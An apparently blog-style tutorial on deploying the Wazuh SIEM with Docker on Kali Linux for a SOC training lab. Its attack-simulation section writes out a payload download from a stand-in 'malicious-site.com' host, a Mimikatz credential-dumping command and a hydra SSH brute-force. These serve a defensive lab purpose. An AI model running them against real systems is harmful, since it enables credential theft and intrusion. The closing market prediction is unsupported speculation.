Listen to this Post

Introduction:
Security Information and Event Management (SIEM) systems are the backbone of any Security Operations Center (SOC), aggregating and analyzing log data from across your infrastructure to detect threats in real time. Wazuh is a powerful, open-source SIEM platform that combines endpoint security, log analysis, and intrusion detection. By deploying Wazuh on Kali Linux using Docker, you can create a fully isolated, production-like lab environment for mastering SOC workflows, threat hunting, and incident response without impacting your host system.
Learning Objectives:
- Deploy a complete Wazuh SIEM stack (Manager, Indexer, Dashboard) on Kali Linux using Docker containers.
- Secure the Wazuh environment with TLS encryption and configure the web dashboard for log ingestion.
- Simulate real-world attack scenarios and learn to query security events using Wazuh’s built-in rules and decoders.
You Should Know:
- Preparing Kali Linux for Docker and SIEM Deployment
Step‑by‑step guide: Before deploying Wazuh, your Kali Linux system must have Docker and Docker Compose installed, along with sufficient resources. Update your package lists, install prerequisites, and verify that the Docker service is running.
Commands (Linux – Kali):
sudo apt update && sudo apt upgrade -y sudo apt install -y docker.io docker-compose curl git sudo systemctl enable docker --now docker --version Verify Docker installation docker-compose --version Verify Compose sudo usermod -aG docker $USER Add your user to docker group (log out/in to apply) newgrp docker
Verify memory and disk space (recommend at least 4GB RAM and 20GB free for containers):
free -h df -h
2. Cloning the Wazuh Docker Deployment Repository
Step‑by‑step guide: Wazuh provides an official GitHub repository with pre-configured Docker Compose files for a production-ready stack. Cloning this repository ensures you get the latest stable version with all necessary service definitions (wazuh-manager, wazuh-indexer, wazuh-dashboard).
Commands:
git clone https://github.com/wazuh/wazuh-docker.git cd wazuh-docker/single-node Use single-node deployment for a lab ls -la Inspect files: docker-compose.yml, .env, configs
Explain the components: `wazuh-manager` handles analysis and rule matching; `wazuh-indexer` (based on OpenSearch) stores indexed logs; `wazuh-dashboard` provides the web UI.
3. Generating TLS Certificates for Secure Communication
Step‑by‑step guide: Wazuh requires TLS certificates to encrypt traffic between the indexer, manager, and dashboard. The repository includes a script (generate-indexer-certs.yml) using Ansible or a simple cert-tool. We’ll use the built‑in `wazuh-certs-generator` for simplicity.
Commands (run from the `single-node` directory):
Create a certificates directory and configuration mkdir -p config/wazuh-indexer/certs cd config/wazuh-indexer Generate a root CA and node certificate using openssl (alternative method if script fails) openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout root-ca-key.pem -out root-ca.pem -subj "/CN=Wazuh CA" openssl genrsa -out wazuh-indexer-key.pem 2048 openssl req -new -key wazuh-indexer-key.pem -out wazuh-indexer.csr -subj "/CN=wazuh-indexer" openssl x509 -req -in wazuh-indexer.csr -CA root-ca.pem -CAkey root-ca-key.pem -CAcreateserial -out wazuh-indexer.pem -days 365
Alternatively, use the official `wazuh-certs-tool` (requires `python3` and pip):
pip install cryptography python3 /path/to/wazuh-docker/single-node/generate-indexer-certs.py --help
Copy the generated certificates to the appropriate locations as defined in docker-compose.yml. Ensure file permissions are restricted (chmod 600 .pem).
4. Deploying Wazuh Stack with Docker Compose
Step‑by‑step guide: After certificates are ready, launch all three containers. Docker Compose will pull the official Wazuh images, create a network, and start the services. Monitor the logs to ensure no errors.
Commands:
cd ~/wazuh-docker/single-node docker-compose up -d Detached mode docker-compose ps Check status (all three should be "Up") docker-compose logs -f Follow logs for real-time debugging
If ports conflict (default: 443 for dashboard, 9200 for indexer, 1514-1515 for manager), edit `docker-compose.yml` to map different host ports. For example, change dashboard port to 8443:443.
Expected output: three containers running. Access the dashboard at `https://
5. Configuring Wazuh Dashboard and Adding Agents
Step‑by‑step guide: Once the dashboard is accessible, you need to register endpoints (agents) to send logs. Wazuh agents are available for Linux, Windows, macOS, and even Dockerized. For your SOC lab, install an agent on a separate virtual machine or even on the Kali host itself.
Commands to add an agent via the CLI (inside the manager container):
docker exec -it wazuh-manager /var/ossec/bin/manage_agents
Inside the tool: choose 'A' to add an agent, provide name and IP, then extract the key.
Alternatively, use the API:
docker exec -it wazuh-manager curl -u admin:admin -k -X POST "https://localhost:55000/agents" -H "Content-Type: application/json" -d '{"name":"windows-agent", "ip":"192.168.1.100"}'
For a Windows agent, download the installer from the Wazuh dashboard under “Agents” > “Deploy new agent”. Choose Windows, copy the pre‑generated command (includes the agent key), and run it on the target machine as Administrator.
Linux agent installation (on Ubuntu/Debian client):
curl -s https://packages.wazuh.com/4.x/keys/GPG-KEY-WAZUH | sudo apt-key add - echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | sudo tee /etc/apt/sources.list.d/wazuh.list sudo apt update && sudo apt install wazuh-agent sudo systemctl start wazuh-agent Then edit /var/ossec/etc/ossec.conf to point to your Wazuh manager IP and agent key
6. Simulating Attack Scenarios and Ingesting Logs
Step‑by‑step guide: A SIEM is only useful when it receives meaningful data. Use common attack simulation tools on an agent machine to generate alerts, then verify that Wazuh detects them. Examples: Nmap scan, Metasploit reverse shell, or Mimikatz on Windows.
On a Linux agent, run:
sudo nmap -sS <target_IP> SYN scan triggers port scan detection rules sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target_IP> Brute force
On a Windows agent (with PowerShell as Admin):
Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile C:\temp\payload.exe Triggers file download rule Run Mimikatz (if allowed in lab) to simulate credential dumping .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Check alerts in the Wazuh dashboard under “Security Events” > “Alerts”. You should see rules such as “Multiple port scans detected” or “Windows Logon Credentials Dumping”. Use filters to search for specific agents or time ranges.
7. Hardening and Maintaining Your Wazuh SIEM Lab
Step‑by‑step guide: A SOC lab must be secure even for testing. Change default passwords, enable firewall rules, back up container volumes, and periodically update Wazuh components. For production‑like hardening, restrict dashboard access to specific IPs and use environment variables for secrets.
Commands to update Wazuh containers:
docker-compose down docker-compose pull Fetch latest images docker-compose up -d Recreate containers with new versions
Backup volumes (where indexes and configurations are stored):
docker run --rm -v wazuh-docker_single-node_wazuh-indexer-data:/data -v $(pwd):/backup alpine tar czf /backup/wazuh-indexer-backup.tar.gz -C /data .
Set up a cron job to regularly back up the configuration files (/var/lib/docker/volumes/).
What Undercode Say:
- Key Takeaway 1: Docker drastically simplifies deploying complex SIEM stacks, allowing analysts to focus on detection engineering rather than infrastructure headaches.
- Key Takeaway 2: Simulating real attacks (e.g., port scans, credential dumping) is the fastest way to learn how Wazuh parses logs and maps them to MITRE ATT&CK techniques.
Analysis: The Wazuh SIEM on Kali Linux with Docker represents a low‑cost, high‑fidelity training ground for aspiring SOC analysts. Unlike commercial SIEMs (Splunk, QRadar), Wazuh is fully open‑source and includes native FIM (File Integrity Monitoring), vulnerability detection, and CASB capabilities. However, challenges such as TLS certificate management, agent connectivity across subnets, and rule tuning require hands‑on practice. The step‑by‑step guide above mirrors real‑world deployment where container orchestration and security hardening are mandatory skills. By ingesting logs from diverse operating systems and simulating attacks, learners develop the ability to differentiate true positives from noise. This lab also integrates seamlessly with TheHive (for SOAR) or Elasticsearch, extending its utility. Ultimately, mastering Wazuh on Kali Linux builds a transferable skill set applicable to any SIEM platform.
Prediction:
Within the next 18 months, open‑source SIEMs like Wazuh will power over 40% of SME SOCs due to their low total cost of ownership and cloud‑native containerization. As regulatory pressures (GDPR, DORA, CMMC) increase log retention mandates, organisations will rely on Docker‑deployed SIEMs for rapid, scalable log management. Expect to see pre‑built “SOC‑in‑a‑box” appliances based on Wazuh, bundled with attack simulation scripts and automated compliance reporting. Analysts who can deploy, tune, and integrate such stacks will command premium salaries, while traditional SIEM vendors may shift toward hybrid licensing models. The biggest challenge will remain talent—hands‑on labs like the one documented here are the only effective answer.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Raymond Ebonine – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


